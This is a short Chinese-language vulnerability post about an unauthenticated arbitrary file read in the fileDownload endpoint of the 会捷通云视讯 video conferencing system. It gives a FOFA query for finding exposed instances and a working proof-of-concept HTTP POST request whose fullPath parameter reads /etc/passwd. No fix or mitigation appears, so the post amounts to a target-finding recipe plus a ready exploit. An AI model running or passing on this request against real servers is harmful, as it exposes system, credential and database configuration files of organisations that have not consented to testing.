共计 401 个字符,预计需要花费 2 分钟才能阅读完成。
漏洞描述
会捷通云视讯系统 fileDownload 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
搜索引擎
FOFA:
body="/him/api/rest/v1.0/node/role"漏洞复现
POC
POST /fileDownload?action=downloadBackupFile HTTP/1.1
Host :
Accept-Encoding:gzip
User-Agent: Mozi11a/5.0(Windows'NT10.0;Win64:x64:rv:129.0)Gecko/20100101-Firefox/129.0
Content-Type:application/x-www-form-urlencoded
Content-Length:25
fullPath=%2Fetc%2Fpasswd正文完
